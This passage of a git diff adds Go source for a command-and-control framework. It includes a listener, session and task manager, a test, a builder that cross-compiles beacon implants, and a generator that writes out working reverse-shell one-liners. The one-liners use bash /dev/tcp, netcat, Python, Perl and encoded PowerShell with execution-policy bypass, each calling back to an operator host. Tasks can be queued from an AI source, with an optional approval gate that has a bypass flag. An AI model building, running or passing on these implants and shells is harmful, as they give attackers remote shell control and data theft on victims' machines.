时,即使已设置桥也不会对危险任务发起审批(与未开启人机协同时其他工具行为一致)。 +func (m *Manager) SetHITLDangerousGate(gate func(conversationID, mcpToolName string) bool) { + m.mu.Lock() + m.hitlDangerousGate = gate + m.mu.Unlock() +} + +// SetHooks 注入业务钩子 +func (m *Manager) SetHooks(h Hooks) { + m.mu.Lock() + m.hooks = h + m.mu.Unlock() +} + +// EventBus 暴露事件总线给 SSE handler +func (m *Manager) EventBus() *EventBus { return m.bus } + +// DB 暴露 DB 句柄给 handler/mcptools 直接读写(避免到处包装) +func (m *Manager) DB() *database.DB { return m.db } + +// Logger 暴露日志句柄 +func (m *Manager) Logger() *zap.Logger { return m.logger } + +// StorageDir 大结果落盘根目录 +func (m *Manager) StorageDir() string { return m.storageDir } + +// Registry 暴露 listener 注册表,便于在 internal/app 启动时按 type 注册具体实现 +func (m *Manager) Registry() *ListenerRegistry { return m.registry } + +// Close 优雅关闭:停掉所有运行中的 listener,关闭事件总线 +func (m *Manager) Close() { + m.mu.Lock() + listeners := make([]Listener, 0, len(m.runningListeners)) + for _, l := range m.runningListeners { + listeners = append(listeners, l) + } + m.runningListeners = make(map[string]Listener) + m.mu.Unlock() + for _, l := range listeners { + _ = l.Stop() + } + m.bus.Close() +} + +// ---------------------------------------------------------------------------- +// Listener 生命周期 +// ---------------------------------------------------------------------------- + +// CreateListenerInput Web/MCP 创建监听器的入参(已校验 + 已 trim) +type CreateListenerInput struct { + Name string + Type string + BindHost string + BindPort int + ProfileID string + Remark string + Config *ListenerConfig + // CallbackHost 非空时写入 config_json.callback_host,供 Payload 默认回连(不修改 bind) + CallbackHost string +} + +// CreateListener 校验并落库;不自动启动(与 systemd unit 一致:先创建后启动) +func (m *Manager) CreateListener(in CreateListenerInput) (*database.C2Listener, error) { + if strings.TrimSpace(in.Name) == "" { + return nil, ErrInvalidInput + } + if !IsValidListenerType(in.Type) { + return nil, ErrUnsupportedType + } + if err := SafeBindPort(in.BindPort); err 
!= nil { + return nil, &CommonError{Code: "invalid_port", Message: err.Error(), HTTP: 400} + } + bindHost := strings.TrimSpace(in.BindHost) + if bindHost == "" { + bindHost = "127.0.0.1" // 默认绑定环回,需要外网时操作员显式改 + } + cfg := in.Config + if cfg == nil { + cfg = &ListenerConfig{} + } else { + cp := *cfg + cfg = &cp + } + if ch := strings.TrimSpace(in.CallbackHost); ch != "" { + cfg.CallbackHost = ch + } + cfg.ApplyDefaults() + cfgJSON, err := json.Marshal(cfg) + if err != nil { + return nil, fmt.Errorf("marshal listener config: %w", err) + } + keyB64, err := GenerateAESKey() + if err != nil { + return nil, fmt.Errorf("generate key: %w", err) + } + tokenB64, err := GenerateImplantToken() + if err != nil { + return nil, fmt.Errorf("generate token: %w", err) + } + + listener := &database.C2Listener{ + ID: "l_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14], + Name: strings.TrimSpace(in.Name), + Type: strings.ToLower(strings.TrimSpace(in.Type)), + BindHost: bindHost, + BindPort: in.BindPort, + ProfileID: strings.TrimSpace(in.ProfileID), + EncryptionKey: keyB64, + ImplantToken: tokenB64, + Status: "stopped", + ConfigJSON: string(cfgJSON), + Remark: strings.TrimSpace(in.Remark), + CreatedAt: time.Now(), + } + if err := m.db.CreateC2Listener(listener); err != nil { + return nil, err + } + m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已创建", listener.Name), map[string]interface{}{ + "listener_id": listener.ID, + "type": listener.Type, + }) + return listener, nil +} + +// StartListener 启动指定 listener;幂等(已运行时返回 ErrListenerRunning) +func (m *Manager) StartListener(id string) (*database.C2Listener, error) { + rec, err := m.db.GetC2Listener(id) + if err != nil { + return nil, err + } + if rec == nil { + return nil, ErrListenerNotFound + } + m.mu.Lock() + if _, ok := m.runningListeners[id]; ok { + m.mu.Unlock() + return rec, ErrListenerRunning + } + m.mu.Unlock() + + cfg := &ListenerConfig{} + if rec.ConfigJSON != "" { + _ = 
json.Unmarshal([]byte(rec.ConfigJSON), cfg) + } + cfg.ApplyDefaults() + + // 通过工厂创建具体实现。必须使用 rec 的副本:HTTP handler 在返回 JSON 前会清空 + // rec.ImplantToken / EncryptionKey 做脱敏,若 listener 实现持有同一指针会导致 beacon 鉴权永久失败。 + listenerRec := *rec + factory := m.registry.Get(rec.Type) + if factory == nil { + return nil, ErrUnsupportedType + } + inst, err := factory(ListenerCreationCtx{ + Listener: &listenerRec, + Config: cfg, + Manager: m, + Logger: m.logger.With(zap.String("listener_id", rec.ID), zap.String("type", rec.Type)), + }) + if err != nil { + return nil, err + } + if err := inst.Start(); err != nil { + now := time.Now() + _ = m.db.SetC2ListenerStatus(rec.ID, "error", err.Error(), &now) + m.publishEvent("warn", "listener", "", "", fmt.Sprintf("监听器 %s 启动失败: %v", rec.Name, err), map[string]interface{}{ + "listener_id": rec.ID, + }) + return nil, err + } + m.mu.Lock() + m.runningListeners[rec.ID] = inst + m.mu.Unlock() + now := time.Now() + _ = m.db.SetC2ListenerStatus(rec.ID, "running", "", &now) + rec.Status = "running" + rec.StartedAt = &now + rec.LastError = "" + m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已启动", rec.Name), map[string]interface{}{ + "listener_id": rec.ID, + "bind": fmt.Sprintf("%s:%d", rec.BindHost, rec.BindPort), + }) + return rec, nil +} + +// StopListener 停止;幂等(未运行时返回 ErrListenerStopped) +func (m *Manager) StopListener(id string) error { + m.mu.Lock() + inst, ok := m.runningListeners[id] + if ok { + delete(m.runningListeners, id) + } + m.mu.Unlock() + if !ok { + return ErrListenerStopped + } + if err := inst.Stop(); err != nil { + return err + } + _ = m.db.SetC2ListenerStatus(id, "stopped", "", nil) + rec, _ := m.db.GetC2Listener(id) + name := id + if rec != nil { + name = rec.Name + } + m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已停止", name), map[string]interface{}{ + "listener_id": id, + }) + return nil +} + +// DeleteListener 停止并删除(级联 sessions/tasks/files) +func (m *Manager) DeleteListener(id string) error { + _ = 
m.StopListener(id) + return m.db.DeleteC2Listener(id) +} + +// IsListenerRunning 内存中的运行状态(DB 中的 status 可能因崩溃而过时) +func (m *Manager) IsListenerRunning(id string) bool { + m.mu.RLock() + defer m.mu.RUnlock() + _, ok := m.runningListeners[id] + return ok +} + +// RestoreRunningListeners 启动期把 DB 中 status=running 的 listener 重新拉起; +// 失败的会被改为 status=error,不会阻塞整个 App 启动。 +func (m *Manager) RestoreRunningListeners() { + listeners, err := m.db.ListC2Listeners() + if err != nil { + m.logger.Warn("恢复 C2 listener 失败:列表查询出错", zap.Error(err)) + return + } + for _, l := range listeners { + if l.Status != "running" { + continue + } + if _, err := m.StartListener(l.ID); err != nil && !errors.Is(err, ErrListenerRunning) { + m.logger.Warn("恢复 C2 listener 失败", zap.String("listener_id", l.ID), zap.Error(err)) + } + } +} + +// ---------------------------------------------------------------------------- +// Session 生命周期 +// ---------------------------------------------------------------------------- + +// IngestCheckIn beacon 上线/心跳的统一入口。 +// 行为: +// 1. 若 implant_uuid 已有会话 → 更新心跳/状态 +// 2. 
否则创建新会话,触发 OnSessionFirstSeen 钩子 +func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*database.C2Session, error) { + if strings.TrimSpace(req.ImplantUUID) == "" { + return nil, ErrInvalidInput + } + existing, err := m.db.GetC2SessionByImplantUUID(req.ImplantUUID) + if err != nil { + return nil, err + } + now := time.Now() + isFirstSeen := existing == nil + var sessID string + if existing != nil { + sessID = existing.ID + } else { + sessID = "s_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + } + session := &database.C2Session{ + ID: sessID, + ListenerID: listenerID, + ImplantUUID: req.ImplantUUID, + Hostname: req.Hostname, + Username: req.Username, + OS: strings.ToLower(req.OS), + Arch: strings.ToLower(req.Arch), + PID: req.PID, + ProcessName: req.ProcessName, + IsAdmin: req.IsAdmin, + InternalIP: req.InternalIP, + UserAgent: req.UserAgent, + SleepSeconds: req.SleepSeconds, + JitterPercent: req.JitterPercent, + Status: string(SessionActive), + FirstSeenAt: now, + LastCheckIn: now, + Metadata: req.Metadata, + } + if existing != nil { + // 保留原 ID/FirstSeenAt/Note,避免被覆盖 + session.FirstSeenAt = existing.FirstSeenAt + if session.Note == "" { + session.Note = existing.Note + } + } + if err := m.db.UpsertC2Session(session); err != nil { + return nil, err + } + if isFirstSeen { + m.publishEvent("critical", "session", session.ID, "", + fmt.Sprintf("新会话上线: %s@%s (%s/%s)", session.Username, session.Hostname, session.OS, session.Arch), + map[string]interface{}{ + "session_id": session.ID, + "listener_id": listenerID, + "hostname": session.Hostname, + "os": session.OS, + "arch": session.Arch, + "internal_ip": session.InternalIP, + }) + m.mu.RLock() + hook := m.hooks.OnSessionFirstSeen + m.mu.RUnlock() + if hook != nil { + go hook(session) + } + } + // 普通心跳:last_check_in 已由 UpsertC2Session 写入 c2_sessions,不再落 c2_events。 + // 否则按 sleep 周期每条心跳一条审计,库表与 SSE 会被迅速撑爆;上线/掉线等仍照常 publishEvent。 + return session, nil +} + +// MarkSessionDead 
心跳超时检测器调用:标记会话为 dead +func (m *Manager) MarkSessionDead(sessionID string) error { + if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil { + return err + } + m.publishEvent("warn", "session", sessionID, "", "会话已离线(心跳超时)", nil) + return nil +} + +// ---------------------------------------------------------------------------- +// Task 生命周期 +// ---------------------------------------------------------------------------- + +// EnqueueTaskInput 下发任务入参 +type EnqueueTaskInput struct { + SessionID string + TaskType TaskType + Payload map[string]interface{} + Source string // manual|ai|batch|api + ConversationID string + UserCtx context.Context // 给 HITL 用 + BypassHITL bool // true 表示跳过 HITL 审批(仅供白名单机制 / 系统内部用) +} + +// EnqueueTask 入队一个新任务;若任务类型危险且未 BypassHITL,且 SetHITLDangerousGate 对当前会话与 MCPToolC2Task 返回 true,才会调 HITL 桥审批。 +// 返回任务记录;任务派发由 PopTasksForBeacon 在 beacon 拉任务时完成。 +func (m *Manager) EnqueueTask(in EnqueueTaskInput) (*database.C2Task, error) { + if strings.TrimSpace(in.SessionID) == "" { + return nil, ErrInvalidInput + } + session, err := m.db.GetC2Session(in.SessionID) + if err != nil { + return nil, err + } + if session == nil { + return nil, ErrSessionNotFound + } + if session.Status == string(SessionDead) || session.Status == string(SessionKilled) { + return nil, &CommonError{Code: "session_inactive", Message: "会话已离线,无法下发任务", HTTP: 409} + } + + // OPSEC: command deny regex enforcement + if in.TaskType == TaskTypeExec || in.TaskType == TaskTypeShell { + cmd, _ := in.Payload["command"].(string) + if cmd != "" { + listenerCfg := m.getListenerConfig(session.ListenerID) + if listenerCfg != nil { + for _, pattern := range listenerCfg.CommandDenyRegex { + re, err := regexp.Compile(pattern) + if err != nil { + m.logger.Warn("invalid command_deny_regex", zap.String("pattern", pattern), zap.Error(err)) + continue + } + if re.MatchString(cmd) { + return nil, &CommonError{ + Code: "command_denied", + Message: fmt.Sprintf("命令被 OPSEC 规则拒绝 (匹配: 
%s)", pattern), + HTTP: 403, + } + } + } + } + } + } + + // OPSEC: max_concurrent_tasks enforcement + listenerCfg := m.getListenerConfig(session.ListenerID) + if listenerCfg != nil && listenerCfg.MaxConcurrentTasks > 0 { + activeTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{ + SessionID: in.SessionID, + Status: string(TaskQueued), + }) + sentTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{ + SessionID: in.SessionID, + Status: string(TaskSent), + }) + concurrent := len(activeTasks) + len(sentTasks) + if concurrent >= listenerCfg.MaxConcurrentTasks { + return nil, &CommonError{ + Code: "concurrent_limit", + Message: fmt.Sprintf("会话已有 %d 个排队/执行中的任务,超过并发上限 %d", concurrent, listenerCfg.MaxConcurrentTasks), + HTTP: 429, + } + } + } + + taskID := "t_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + task := &database.C2Task{ + ID: taskID, + SessionID: in.SessionID, + TaskType: string(in.TaskType), + Payload: in.Payload, + Status: string(TaskQueued), + Source: strOr(in.Source, "manual"), + ConversationID: in.ConversationID, + CreatedAt: time.Now(), + } + + // HITL 检查:仅当注入的 gate 认为当前会话应对统一 MCP 工具 c2_task 做人机协同时才走桥(关闭人机协同时与其它工具一致,直接入队)。 + if IsDangerousTaskType(in.TaskType) && !in.BypassHITL { + m.mu.RLock() + bridge := m.hitlBridge + gate := m.hitlDangerousGate + m.mu.RUnlock() + convID := strings.TrimSpace(in.ConversationID) + useBridge := bridge != nil && gate != nil && gate(convID, MCPToolC2Task) + if useBridge { + task.ApprovalStatus = "pending" + if err := m.db.CreateC2Task(task); err != nil { + return nil, err + } + m.publishEvent("warn", "task", in.SessionID, taskID, fmt.Sprintf("危险任务待审批: %s", in.TaskType), map[string]interface{}{ + "task_id": taskID, + "task_type": in.TaskType, + }) + payloadBytes, _ := json.Marshal(in.Payload) + ctx := HITLUserContext(in.UserCtx) + if ctx == nil { + ctx = context.Background() + } + go func() { + err := bridge.RequestApproval(ctx, HITLApprovalRequest{ + TaskID: taskID, + SessionID: in.SessionID, + 
TaskType: string(in.TaskType), + PayloadJSON: string(payloadBytes), + ConversationID: in.ConversationID, + Source: task.Source, + Reason: fmt.Sprintf("C2 危险任务 %s", in.TaskType), + }) + if err != nil { + rejected := "rejected" + failed := string(TaskFailed) + errMsg := "HITL 拒绝: " + err.Error() + _ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ + ApprovalStatus: &rejected, + Status: &failed, + Error: &errMsg, + }) + m.publishEvent("warn", "task", in.SessionID, taskID, errMsg, nil) + return + } + approved := "approved" + _ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ApprovalStatus: &approved}) + m.publishEvent("info", "task", in.SessionID, taskID, "危险任务已批准", nil) + }() + return task, nil + } + // 未接桥或会话未开启人机协同 / 工具在白名单:直接入队 + task.ApprovalStatus = "approved" + } + + if err := m.db.CreateC2Task(task); err != nil { + return nil, err + } + m.publishEvent("info", "task", in.SessionID, taskID, fmt.Sprintf("任务已入队: %s", in.TaskType), map[string]interface{}{ + "task_id": taskID, + "task_type": in.TaskType, + "source": task.Source, + }) + return task, nil +} + +// CancelTask 取消队列中的任务(已 sent/running 的暂不支持回滚) +func (m *Manager) CancelTask(taskID string) error { + t, err := m.db.GetC2Task(taskID) + if err != nil { + return err + } + if t == nil { + return ErrTaskNotFound + } + if t.Status != string(TaskQueued) && t.Status != string(TaskSent) { + return &CommonError{Code: "task_running", Message: "任务已在执行,无法取消", HTTP: 409} + } + cancelled := string(TaskCancelled) + now := time.Now() + if err := m.db.UpdateC2Task(taskID, database.C2TaskUpdate{Status: &cancelled, CompletedAt: &now}); err != nil { + return err + } + m.publishEvent("info", "task", t.SessionID, taskID, "任务已取消", nil) + return nil +} + +// PopTasksForBeacon beacon check_in 后调用:取该会话所有 queued+approved 的任务, +// 内部已置为 sent;返回 TaskEnvelope,便于 listener 直接编码下发。 +func (m *Manager) PopTasksForBeacon(sessionID string, limit int) ([]TaskEnvelope, error) { + tasks, err := m.db.PopQueuedC2Tasks(sessionID, limit) + if err != 
nil { + return nil, err + } + out := make([]TaskEnvelope, 0, len(tasks)) + for _, t := range tasks { + out = append(out, TaskEnvelope{TaskID: t.ID, TaskType: t.TaskType, Payload: t.Payload}) + } + return out, nil +} + +// IngestTaskResult beacon 回传任务结果的统一入口 +func (m *Manager) IngestTaskResult(report TaskResultReport) error { + if strings.TrimSpace(report.TaskID) == "" { + return ErrInvalidInput + } + t, err := m.db.GetC2Task(report.TaskID) + if err != nil { + return err + } + if t == nil { + return ErrTaskNotFound + } + + startedAt := time.Unix(0, report.StartedAt*int64(time.Millisecond)) + endedAt := time.Unix(0, report.EndedAt*int64(time.Millisecond)) + if report.StartedAt == 0 { + startedAt = time.Now() + } + if report.EndedAt == 0 { + endedAt = time.Now() + } + + status := string(TaskSuccess) + if !report.Success { + status = string(TaskFailed) + } + duration := endedAt.Sub(startedAt).Milliseconds() + upd := database.C2TaskUpdate{ + Status: &status, + ResultText: &report.Output, + Error: &report.Error, + StartedAt: &startedAt, + CompletedAt: &endedAt, + DurationMS: &duration, + } + + // blob(如截图)落盘 + if len(report.BlobBase64) > 0 { + blobPath, err := m.saveResultBlob(t.ID, report.BlobBase64, report.BlobSuffix) + if err == nil { + upd.ResultBlobPath = &blobPath + } else { + m.logger.Warn("结果 blob 落盘失败", zap.Error(err), zap.String("task_id", t.ID)) + } + } + + if err := m.db.UpdateC2Task(t.ID, upd); err != nil { + return err + } + t.Status = status + t.ResultText = report.Output + t.Error = report.Error + + level := "info" + msg := fmt.Sprintf("任务完成: %s", t.TaskType) + if !report.Success { + level = "warn" + msg = fmt.Sprintf("任务失败: %s (%s)", t.TaskType, report.Error) + } + m.publishEvent(level, "task", t.SessionID, t.ID, msg, map[string]interface{}{ + "task_id": t.ID, + "task_type": t.TaskType, + "duration": duration, + }) + + m.mu.RLock() + hook := m.hooks.OnTaskCompleted + m.mu.RUnlock() + if hook != nil { + go hook(t, t.SessionID) + } + return nil +} + +func 
(m *Manager) saveResultBlob(taskID, b64Content, suffix string) (string, error) { + suffix = strings.TrimSpace(suffix) + if suffix == "" { + suffix = ".bin" + } + if !strings.HasPrefix(suffix, ".") { + suffix = "." + suffix + } + dir := filepath.Join(m.storageDir, "results") + if err := osMkdirAll(dir, 0o755); err != nil { + return "", err + } + path := filepath.Join(dir, taskID+suffix) + data, err := base64Decode(b64Content) + if err != nil { + return "", err + } + if err := osWriteFile(path, data, 0o644); err != nil { + return "", err + } + return path, nil +} + +// ---------------------------------------------------------------------------- +// 事件总线辅助 +// ---------------------------------------------------------------------------- + +// publishEvent 同步写 c2_events 表 + 投放到内存事件总线 +func (m *Manager) publishEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) { + id := "e_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + now := time.Now() + e := &database.C2Event{ + ID: id, + Level: level, + Category: category, + SessionID: sessionID, + TaskID: taskID, + Message: message, + Data: data, + CreatedAt: now, + } + if err := m.db.AppendC2Event(e); err != nil { + m.logger.Warn("写 C2 事件失败", zap.Error(err), zap.String("category", category)) + } + m.bus.Publish(&Event{ + ID: id, + Level: level, + Category: category, + SessionID: sessionID, + TaskID: taskID, + Message: message, + Data: data, + CreatedAt: now, + }) +} + +// PublishCustomEvent 给外部组件(HITL 桥 / handler)写自定义事件用 +func (m *Manager) PublishCustomEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) { + m.publishEvent(level, category, sessionID, taskID, message, data) +} + +// ---------------------------------------------------------------------------- +// 工具函数 +// ---------------------------------------------------------------------------- + +func strOr(s, def string) string { + if strings.TrimSpace(s) == "" { + return def + } + return s +} + 
+// getListenerConfig loads and parses the listener's config JSON from DB. +func (m *Manager) getListenerConfig(listenerID string) *ListenerConfig { + listener, err := m.db.GetC2Listener(listenerID) + if err != nil || listener == nil { + return nil + } + cfg := &ListenerConfig{} + if listener.ConfigJSON != "" && listener.ConfigJSON != "{}" { + _ = json.Unmarshal([]byte(listener.ConfigJSON), cfg) + } + return cfg +} + +// GetProfile loads a C2Profile from DB by ID. +func (m *Manager) GetProfile(profileID string) (*database.C2Profile, error) { + if strings.TrimSpace(profileID) == "" { + return nil, nil + } + return m.db.GetC2Profile(profileID) +} diff --git a/c2/manager_start_test.go b/c2/manager_start_test.go new file mode 100644 index 00000000..9bf15a36 --- /dev/null +++ b/c2/manager_start_test.go @@ -0,0 +1,74 @@ +package c2 + +import ( + "io" + "net" + "net/http" + "path/filepath" + "strconv" + "strings" + "testing" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// 回归:StartListener 返回的 rec 被 handler 脱敏清空 ImplantToken 后,运行中的 HTTP listener 仍能鉴权。 +func TestStartListener_ImplantTokenSurvivesHandlerRedaction(t *testing.T) { + tmp := t.TempDir() + db, err := database.NewDB(filepath.Join(tmp, "c2.sqlite"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = db.Close() }) + + lnPick, err := net.Listen("tcp", "127.0.0.1:0") + if err != nil { + t.Fatal(err) + } + port := lnPick.Addr().(*net.TCPAddr).Port + _ = lnPick.Close() + + mgr := NewManager(db, zap.NewNop(), tmp) + mgr.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener) + rec, err := mgr.CreateListener(CreateListenerInput{ + Name: "t", + Type: string(ListenerTypeHTTPBeacon), + BindHost: "127.0.0.1", + BindPort: port, + }) + if err != nil { + t.Fatal(err) + } + token := rec.ImplantToken + + rec, err = mgr.StartListener(rec.ID) + if err != nil { + t.Fatal(err) + } + // 模拟 internal/handler/c2.go StartListener 在 JSON 响应前的脱敏 + rec.ImplantToken = 
// PayloadBuilderInput carries the parameters for building a beacon binary.
type PayloadBuilderInput struct {
	ListenerID    string // listener ID, e.g. l_xxx
	OS            string // target OS: linux|windows|darwin (BuildBeacon defaults to linux when empty)
	Arch          string // target arch: amd64|arm64|386 (BuildBeacon defaults to amd64 when empty)
	SleepSeconds  int    // heartbeat interval; when <= 0 BuildBeacon falls back to the listener default, then 5
	JitterPercent int    // jitter percentage; BuildBeacon clamps it to 0-100
	OutputName    string // custom output filename (without extension); defaults to "beacon_<os>_<arch>"
	// Host, when non-empty, is the address the implant calls back to
	// (overrides the listener's bind_host / 0.0.0.0 auto-detection).
	Host string
}
&PayloadBuilder{ + manager: manager, + logger: logger, + tmplDir: tmplDir, + outputDir: outputDir, + } +} + +// BuildResult 构建结果 +type BuildResult struct { + PayloadID string `json:"payload_id"` + ListenerID string `json:"listener_id"` + OutputPath string `json:"output_path"` + DownloadPath string `json:"download_path"` // 磁盘上的绝对路径 + OS string `json:"os"` + Arch string `json:"arch"` + SizeBytes int64 `json:"size_bytes"` +} + +// BuildBeacon 交叉编译生成 beacon 二进制 +func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, error) { + listener, err := b.manager.DB().GetC2Listener(in.ListenerID) + if err != nil { + return nil, fmt.Errorf("get listener: %w", err) + } + if listener == nil { + return nil, ErrListenerNotFound + } + + lt := strings.ToLower(listener.Type) + + cfg := &ListenerConfig{} + if listener.ConfigJSON != "" { + _ = parseJSON(listener.ConfigJSON, cfg) + } + cfg.ApplyDefaults() + + // 确定目标架构 + goos := strings.ToLower(in.OS) + goarch := strings.ToLower(in.Arch) + if goos == "" { + goos = "linux" + } + if goarch == "" { + goarch = "amd64" + } + + // 读取模板 + tmplPath := filepath.Join(b.tmplDir, "beacon.go.tmpl") + tmplData, err := os.ReadFile(tmplPath) + if err != nil { + return nil, fmt.Errorf("read template: %w", err) + } + + // 模板参数:请求 Host > 监听器 callback_host > bind 推导(见 ResolveBeaconDialHost) + host := ResolveBeaconDialHost(listener, in.Host, b.logger, listener.ID) + serverURL := fmt.Sprintf("%s://%s:%d", + listenerTypeToScheme(listener.Type), + host, + listener.BindPort, + ) + + transport := "http" + tcpDialAddr := "" + transportMeta := "http_beacon" + switch lt { + case "tcp_reverse": + transport = "tcp" + tcpDialAddr = net.JoinHostPort(host, strconv.Itoa(listener.BindPort)) + transportMeta = "tcp_beacon" + case "https_beacon": + transportMeta = "https_beacon" + case "websocket": + transportMeta = "websocket" + } + + data := map[string]string{ + "Transport": transport, + "TCPDialAddr": tcpDialAddr, + "TransportMetadata": transportMeta, + 
"ServerURL": serverURL, + "ImplantToken": listener.ImplantToken, + "AESKeyB64": listener.EncryptionKey, + "SleepSeconds": fmt.Sprintf("%d", firstPositive(in.SleepSeconds, cfg.DefaultSleep, 5)), + "JitterPercent": fmt.Sprintf("%d", clamp(in.JitterPercent, 0, 100)), + "CheckInPath": cfg.BeaconCheckInPath, + "TasksPath": cfg.BeaconTasksPath, + "ResultPath": cfg.BeaconResultPath, + "UploadPath": cfg.BeaconUploadPath, + "FilePath": cfg.BeaconFilePath, + "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + } + + // 执行模板 + tmpl, err := template.New("beacon").Parse(string(tmplData)) + if err != nil { + return nil, fmt.Errorf("parse template: %w", err) + } + + // 创建工作目录 + workDir := filepath.Join(b.outputDir, "build-"+uuid.New().String()[:8]) + if err := os.MkdirAll(workDir, 0755); err != nil { + return nil, fmt.Errorf("mkdir: %w", err) + } + defer os.RemoveAll(workDir) // 清理 + + srcPath := filepath.Join(workDir, "main.go") + f, err := os.Create(srcPath) + if err != nil { + return nil, fmt.Errorf("create source: %w", err) + } + if err := tmpl.Execute(f, data); err != nil { + f.Close() + return nil, fmt.Errorf("execute template: %w", err) + } + f.Close() + + // 交叉编译 + binName := strings.TrimSpace(in.OutputName) + if binName == "" { + binName = fmt.Sprintf("beacon_%s_%s", goos, goarch) + } + if goos == "windows" && !strings.HasSuffix(binName, ".exe") { + binName += ".exe" + } + binPath := filepath.Join(b.outputDir, binName) + + if err := os.MkdirAll(b.outputDir, 0755); err != nil { + return nil, fmt.Errorf("mkdir output: %w", err) + } + + absSrcPath, err := filepath.Abs(srcPath) + if err != nil { + return nil, fmt.Errorf("abs source path: %w", err) + } + absBinPath, err := filepath.Abs(binPath) + if err != nil { + return nil, fmt.Errorf("abs output path: %w", err) + } + cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath) + cmd.Env = append(os.Environ(), + "GOOS="+goos, + "GOARCH="+goarch, + 
"CGO_ENABLED=0", + ) + cmd.Dir = workDir + output, err := cmd.CombinedOutput() + if err != nil { + b.logger.Error("beacon build failed", zap.String("output", string(output)), zap.Error(err)) + return nil, fmt.Errorf("build failed: %w (output: %s)", err, string(output)) + } + + // 获取文件大小 + info, err := os.Stat(binPath) + if err != nil { + return nil, fmt.Errorf("stat output: %w", err) + } + + payloadID := "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + return &BuildResult{ + PayloadID: payloadID, + ListenerID: listener.ID, + OutputPath: absBinPath, + DownloadPath: absBinPath, + OS: goos, + Arch: goarch, + SizeBytes: info.Size(), + }, nil +} + +func listenerTypeToScheme(t string) string { + switch strings.ToLower(t) { + case "https_beacon": + return "https" + case "websocket": + return "ws" + case "http_beacon": + return "http" + default: + return "http" + } +} + +func firstPositive(vals ...int) int { + for _, v := range vals { + if v > 0 { + return v + } + } + return 1 +} + +func clamp(v, min, max int) int { + if v < min { + return min + } + if v > max { + return max + } + return v +} + +// GetPayloadStoragePath 返回 payload 存储目录的绝对路径 +func (b *PayloadBuilder) GetPayloadStoragePath() string { + abs, _ := filepath.Abs(b.outputDir) + return abs +} + +// GetSupportedOSArch 返回支持的操作系统和架构列表 +func GetSupportedOSArch() map[string][]string { + return map[string][]string{ + "linux": {"amd64", "arm64", "386", "arm"}, + "windows": {"amd64", "arm64", "386"}, + "darwin": {"amd64", "arm64"}, + } +} + +// ValidateOSArch 验证 OS/Arch 组合是否可编译 +func ValidateOSArch(os, arch string) bool { + supported := GetSupportedOSArch() + arches, ok := supported[strings.ToLower(os)] + if !ok { + return false + } + for _, a := range arches { + if a == strings.ToLower(arch) { + return true + } + } + return false +} + +// detectExternalIP returns the first non-loopback IPv4 address, or "" if none found. 
// utf16LEBase64 converts s to UTF-16LE and returns the standard base64
// encoding of those bytes (the format PowerShell -EncodedCommand accepts).
//
// Code points up to U+FFFF become one 16-bit unit; code points above U+FFFF
// become a surrogate pair (high unit 0xD800-0xDBFF followed by low unit
// 0xDC00-0xDFFF) instead of being truncated to their low 16 bits. Invalid
// UTF-8 in s decodes to U+FFFD, as with any Go string iteration.
func utf16LEBase64(s string) string {
	// Every UTF-8 byte sequence needs at most twice its length in UTF-16.
	buf := make([]byte, 0, len(s)*2)
	var unit [2]byte
	for _, r := range s {
		if r > 0xFFFF {
			// Split the 20-bit offset into two 10-bit halves.
			off := r - 0x10000
			binary.LittleEndian.PutUint16(unit[:], uint16(0xD800+(off>>10)))
			buf = append(buf, unit[:]...)
			r = 0xDC00 + (off & 0x3FF)
		}
		binary.LittleEndian.PutUint16(unit[:], uint16(r))
		buf = append(buf, unit[:]...)
	}
	return base64.StdEncoding.EncodeToString(buf)
}
// OnelinerInput carries the parameters for GenerateOneliner.
type OnelinerInput struct {
	Kind         OnelinerKind // which one-liner form to generate
	Host         string       // callback address (IP or domain); required for every kind
	Port         int          // listener port; checked with SafeBindPort for the raw-TCP kinds
	HTTPBaseURL  string       // base URL of the HTTP(S) beacon listener, e.g. https://x.com; required for curl_beacon
	ImplantToken string       // HTTP beacon auth token; required for curl_beacon
}
base64,sys;exec(base64.b64decode('%s').decode())"`, + b64StdEncode(py), + ), nil + + case OnelinerPerl: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + return fmt.Sprintf( + `perl -e 'use Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`, + host, in.Port, + ), nil + + case OnelinerPowerShell: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + // PowerShell TCP 反弹(不依赖 .NET old 版本) + ps := fmt.Sprintf( + `$c=New-Object System.Net.Sockets.TcpClient('%s',%d);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o2=$o+'PS '+(pwd).Path+'> ';$by=([text.encoding]::ASCII).GetBytes($o2);$s.Write($by,0,$by.Length);$s.Flush()};$c.Close()`, + host, in.Port, + ) + return fmt.Sprintf( + `powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand %s`, + utf16LEBase64(ps), + ), nil + + case 